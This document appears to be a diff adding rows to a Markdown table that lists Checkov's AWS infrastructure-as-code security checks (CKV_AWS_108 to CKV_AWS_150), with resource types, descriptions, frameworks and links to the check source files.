+|  420 | CKV_AWS_108              | resource                         | AWS::IAM::Policy                                                                                 | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation          | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                                    |
+|  421 | CKV_AWS_108              | resource                         | AWS::IAM::Role                                                                                   | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation          | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                                    |
+|  422 | CKV_AWS_108              | resource                         | AWS::IAM::User                                                                                   | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation          | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                                    |
+|  423 | CKV_AWS_108              | data                             | aws_iam_policy_document                                                                          | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform               | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py)                                                                                             |
+|  424 | CKV_AWS_109              | resource                         | AWS::IAM::Group                                                                                  | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation          | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                                          |
+|  425 | CKV_AWS_109              | resource                         | AWS::IAM::ManagedPolicy                                                                          | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation          | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                                          |
+|  426 | CKV_AWS_109              | resource                         | AWS::IAM::Policy                                                                                 | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation          | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                                          |
+|  427 | CKV_AWS_109              | resource                         | AWS::IAM::Role                                                                                   | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation          | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                                          |
+|  428 | CKV_AWS_109              | resource                         | AWS::IAM::User                                                                                   | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation          | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                                          |
+|  429 | CKV_AWS_109              | data                             | aws_iam_policy_document                                                                          | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform               | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py)                                                                                   |
+|  430 | CKV_AWS_110              | resource                         | AWS::IAM::Group                                                                                  | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation          | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                              |
+|  431 | CKV_AWS_110              | resource                         | AWS::IAM::ManagedPolicy                                                                          | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation          | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                              |
+|  432 | CKV_AWS_110              | resource                         | AWS::IAM::Policy                                                                                 | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation          | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                              |
+|  433 | CKV_AWS_110              | resource                         | AWS::IAM::Role                                                                                   | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation          | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                              |
+|  434 | CKV_AWS_110              | resource                         | AWS::IAM::User                                                                                   | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation          | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                              |
+|  435 | CKV_AWS_110              | data                             | aws_iam_policy_document                                                                          | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform               | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py)                                                                                       |
+|  436 | CKV_AWS_111              | resource                         | AWS::IAM::Group                                                                                  | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation          | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                              |
+|  437 | CKV_AWS_111              | resource                         | AWS::IAM::ManagedPolicy                                                                          | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation          | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                              |
+|  438 | CKV_AWS_111              | resource                         | AWS::IAM::Policy                                                                                 | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation          | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                              |
+|  439 | CKV_AWS_111              | resource                         | AWS::IAM::Role                                                                                   | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation          | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                              |
+|  440 | CKV_AWS_111              | resource                         | AWS::IAM::User                                                                                   | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation          | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                              |
+|  441 | CKV_AWS_111              | data                             | aws_iam_policy_document                                                                          | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform               | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py)                                                                                                       |
+|  442 | CKV_AWS_112              | resource                         | aws_ssm_document                                                                                 | Ensure Session Manager data is encrypted in transit                                                                                                                                                      | Terraform               | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py)                                                         |
+|  443 | CKV_AWS_113              | resource                         | aws_ssm_document                                                                                 | Ensure Session Manager logs are enabled and encrypted                                                                                                                                                    | Terraform               | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py)                                                               |
+|  444 | CKV_AWS_114              | resource                         | aws_emr_cluster                                                                                  | Ensure that EMR clusters with Kerberos have Kerberos Realm set                                                                                                                                           | Terraform               | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py)                                                                       |
+|  445 | CKV_AWS_115              | resource                         | AWS::Lambda::Function                                                                            | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Cloudformation          | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                                    |
+|  446 | CKV_AWS_115              | resource                         | AWS::Serverless::Function                                                                        | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Cloudformation          | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                                    |
+|  447 | CKV_AWS_115              | resource                         | aws_lambda_function                                                                              | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Terraform               | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                                         |
+|  448 | CKV_AWS_116              | resource                         | AWS::Lambda::Function                                                                            | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Cloudformation          | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py)                                                                                    |
+|  449 | CKV_AWS_116              | resource                         | AWS::Serverless::Function                                                                        | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Cloudformation          | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py)                                                                                    |
+|  450 | CKV_AWS_116              | resource                         | aws_lambda_function                                                                              | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Terraform               | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py)                                                                                         |
+|  451 | CKV_AWS_117              | resource                         | AWS::Lambda::Function                                                                            | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Cloudformation          | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py)                                                                                                    |
+|  452 | CKV_AWS_117              | resource                         | AWS::Serverless::Function                                                                        | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Cloudformation          | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py)                                                                                                    |
+|  453 | CKV_AWS_117              | resource                         | aws_lambda_function                                                                              | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Terraform               | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py)                                                                                                         |
+|  454 | CKV_AWS_118              | resource                         | AWS::RDS::DBInstance                                                                             | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Cloudformation          | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                                        |
+|  455 | CKV_AWS_118              | resource                         | aws_db_instance                                                                                  | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Terraform               | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                                             |
+|  456 | CKV_AWS_118              | resource                         | aws_rds_cluster_instance                                                                         | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Terraform               | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                                             |
+|  457 | CKV_AWS_119              | resource                         | AWS::DynamoDB::Table                                                                             | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK                                                                                                                                    | Cloudformation          | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py)                                                                            |
+|  458 | CKV_AWS_119              | resource                         | aws_dynamodb_table                                                                               | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK                                                                                                                                    | Terraform               | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py)                                                                                 |
+|  459 | CKV_AWS_120              | resource                         | AWS::ApiGateway::Stage                                                                           | Ensure API Gateway caching is enabled                                                                                                                                                                    | Cloudformation          | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py)                                                                                |
+|  460 | CKV_AWS_120              | resource                         | AWS::Serverless::Api                                                                             | Ensure API Gateway caching is enabled                                                                                                                                                                    | Cloudformation          | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py)                                                                                |
+|  461 | CKV_AWS_120              | resource                         | aws_api_gateway_stage                                                                            | Ensure API Gateway caching is enabled                                                                                                                                                                    | Terraform               | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py)                                                                                     |
+|  462 | CKV_AWS_121              | resource                         | aws_config_configuration_aggregator                                                              | Ensure AWS Config is enabled in all regions                                                                                                                                                              | Terraform               | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py)                                                   |
+|  463 | CKV_AWS_122              | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance                                                                                                                 | Terraform               | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py)                                                                 |
+|  464 | CKV_AWS_123              | resource                         | AWS::EC2::VPCEndpointService                                                                     | Ensure that VPC Endpoint Service is configured for Manual Acceptance                                                                                                                                     | Cloudformation          | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py)                                                            |
+|  465 | CKV_AWS_123              | resource                         | aws_vpc_endpoint_service                                                                         | Ensure that VPC Endpoint Service is configured for Manual Acceptance                                                                                                                                     | Terraform               | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py)                                                                 |
+|  466 | CKV_AWS_124              | resource                         | aws_cloudformation_stack                                                                         | Ensure that CloudFormation stacks are sending event notifications to an SNS topic                                                                                                                        | Terraform               | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py)                                                         |
+|  467 | CKV_AWS_126              | resource                         | aws_instance                                                                                     | Ensure that detailed monitoring is enabled for EC2 instances                                                                                                                                             | Terraform               | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py)                                                                       |
+|  468 | CKV_AWS_127              | resource                         | aws_elb                                                                                          | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager                                                                                                           | Terraform               | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py)                                                                                                           |
+|  469 | CKV_AWS_129              | resource                         | aws_db_instance                                                                                  | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled                                                                                                               | Terraform               | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py)                                                                                             |
+|  470 | CKV_AWS_130              | resource                         | aws_subnet                                                                                       | Ensure VPC subnets do not assign public IP by default                                                                                                                                                    | Terraform               | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py)                                                                                                   |
+|  471 | CKV_AWS_131              | resource                         | AWS::ElasticLoadBalancingV2::LoadBalancer                                                        | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Cloudformation          | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py)                                                                                      |
+|  472 | CKV_AWS_131              | resource                         | aws_alb                                                                                          | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Terraform               | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py)                                                                                           |
+|  473 | CKV_AWS_131              | resource                         | aws_lb                                                                                           | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Terraform               | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py)                                                                                           |
+|  474 | CKV_AWS_133              | resource                         | aws_db_instance                                                                                  | Ensure that RDS instances has backup policy                                                                                                                                                              | Terraform               | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py)                                                                 |
+|  475 | CKV_AWS_133              | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS instances has backup policy                                                                                                                                                              | Terraform               | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py)                                                                 |
+|  476 | CKV_AWS_134              | resource                         | aws_elasticache_cluster                                                                          | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on                                                                                                                            | Terraform               | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py)                                                                         |
+|  477 | CKV_AWS_135              | resource                         | [?"amazon.aws.ec2_instance" != null][]                                                           | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  478 | CKV_AWS_135              | resource                         | [?"ec2_instance" != null][]                                                                      | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  479 | CKV_AWS_135              | resource                         | [].block[?"amazon.aws.ec2_instance" != null][]                                                   | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  480 | CKV_AWS_135              | resource                         | [].block[?"ec2_instance" != null][]                                                              | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  481 | CKV_AWS_135              | resource                         | [].block[].block[?"amazon.aws.ec2_instance" != null][]                                           | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  482 | CKV_AWS_135              | resource                         | [].block[].block[?"ec2_instance" != null][]                                                      | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  483 | CKV_AWS_135              | resource                         | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][]                                   | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  484 | CKV_AWS_135              | resource                         | [].block[].block[].block[?"ec2_instance" != null][]                                              | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  485 | CKV_AWS_135              | resource                         | [].tasks[?"amazon.aws.ec2_instance" != null][]                                                   | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  486 | CKV_AWS_135              | resource                         | [].tasks[?"ec2_instance" != null][]                                                              | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  487 | CKV_AWS_135              | resource                         | [].tasks[].block[?"amazon.aws.ec2_instance" != null][]                                           | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  488 | CKV_AWS_135              | resource                         | [].tasks[].block[?"ec2_instance" != null][]                                                      | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  489 | CKV_AWS_135              | resource                         | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][]                                   | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  490 | CKV_AWS_135              | resource                         | [].tasks[].block[].block[?"ec2_instance" != null][]                                              | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  491 | CKV_AWS_135              | resource                         | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][]                           | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  492 | CKV_AWS_135              | resource                         | [].tasks[].block[].block[].block[?"ec2_instance" != null][]                                      | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                                       |
+|  493 | CKV_AWS_135              | resource                         | aws_instance                                                                                     | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Terraform               | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py)                                                                                                 |
+|  494 | CKV_AWS_136              | resource                         | AWS::ECR::Repository                                                                             | Ensure that ECR repositories are encrypted using KMS                                                                                                                                                     | Cloudformation          | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py)                                                                              |
+|  495 | CKV_AWS_136              | resource                         | aws_ecr_repository                                                                               | Ensure that ECR repositories are encrypted using KMS                                                                                                                                                     | Terraform               | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py)                                                                                   |
+|  496 | CKV_AWS_137              | resource                         | aws_elasticsearch_domain                                                                         | Ensure that Elasticsearch is configured inside a VPC                                                                                                                                                     | Terraform               | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py)                                                                                           |
+|  497 | CKV_AWS_137              | resource                         | aws_opensearch_domain                                                                            | Ensure that Elasticsearch is configured inside a VPC                                                                                                                                                     | Terraform               | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py)                                                                                           |
+|  498 | CKV_AWS_138              | resource                         | aws_elb                                                                                          | Ensure that ELB is cross-zone-load-balancing enabled                                                                                                                                                     | Terraform               | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py)                                                                                           |
+|  499 | CKV_AWS_139              | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS clusters have deletion protection enabled                                                                                                                                                | Terraform               | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py)                                                                                     |
+|  500 | CKV_AWS_140              | resource                         | aws_rds_global_cluster                                                                           | Ensure that RDS global clusters are encrypted                                                                                                                                                            | Terraform               | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py)                                                                                         |
+|  501 | CKV_AWS_141              | resource                         | aws_redshift_cluster                                                                             | Ensured that Redshift cluster allowing version upgrade by default                                                                                                                                        | Terraform               | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py)                                                           |
+|  502 | CKV_AWS_142              | resource                         | aws_redshift_cluster                                                                             | Ensure that Redshift cluster is encrypted by KMS                                                                                                                                                         | Terraform               | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py)                                                                                     |
+|  503 | CKV_AWS_143              | resource                         | aws_s3_bucket                                                                                    | Ensure that S3 bucket has lock configuration enabled by default                                                                                                                                          | Terraform               | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py)                                                                                           |
+|  504 | CKV_AWS_144              | resource                         | aws_s3_bucket                                                                                    | Ensure that S3 bucket has cross-region replication enabled                                                                                                                                               | Terraform               | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml)                                                       |
+|  505 | CKV_AWS_144              | resource                         | aws_s3_bucket_replication_configuration                                                          | Ensure that S3 bucket has cross-region replication enabled                                                                                                                                               | Terraform               | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml)                                                       |
+|  506 | CKV_AWS_145              | resource                         | aws_s3_bucket                                                                                    | Ensure that S3 buckets are encrypted with KMS by default                                                                                                                                                 | Terraform               | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml)                                                                         |
+|  507 | CKV_AWS_145              | resource                         | aws_s3_bucket_server_side_encryption_configuration                                               | Ensure that S3 buckets are encrypted with KMS by default                                                                                                                                                 | Terraform               | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml)                                                                         |
+|  508 | CKV_AWS_146              | resource                         | aws_db_cluster_snapshot                                                                          | Ensure that RDS database cluster snapshot is encrypted                                                                                                                                                   | Terraform               | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py)                                                                         |
+|  509 | CKV_AWS_147              | resource                         | aws_codebuild_project                                                                            | Ensure that CodeBuild projects are encrypted using CMK                                                                                                                                                   | Terraform               | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py)                                                                                               |
+|  510 | CKV_AWS_148              | resource                         | aws_default_vpc                                                                                  | Ensure no default VPC is planned to be provisioned                                                                                                                                                       | Terraform               | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py)                                                                                             |
+|  511 | CKV_AWS_149              | resource                         | AWS::SecretsManager::Secret                                                                      | Ensure that Secrets Manager secret is encrypted using KMS CMK                                                                                                                                            | Cloudformation          | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py)                                                                  |
+|  512 | CKV_AWS_149              | resource                         | aws_secretsmanager_secret                                                                        | Ensure that Secrets Manager secret is encrypted using KMS CMK                                                                                                                                            | Terraform               | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py)                                                                       |
+|  513 | CKV_AWS_150              | resource                         | aws_alb                                                                                          | Ensure that Load Balancer has deletion protection enabled                                                                                                                                                | Terraform               | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py)                                                                                       |
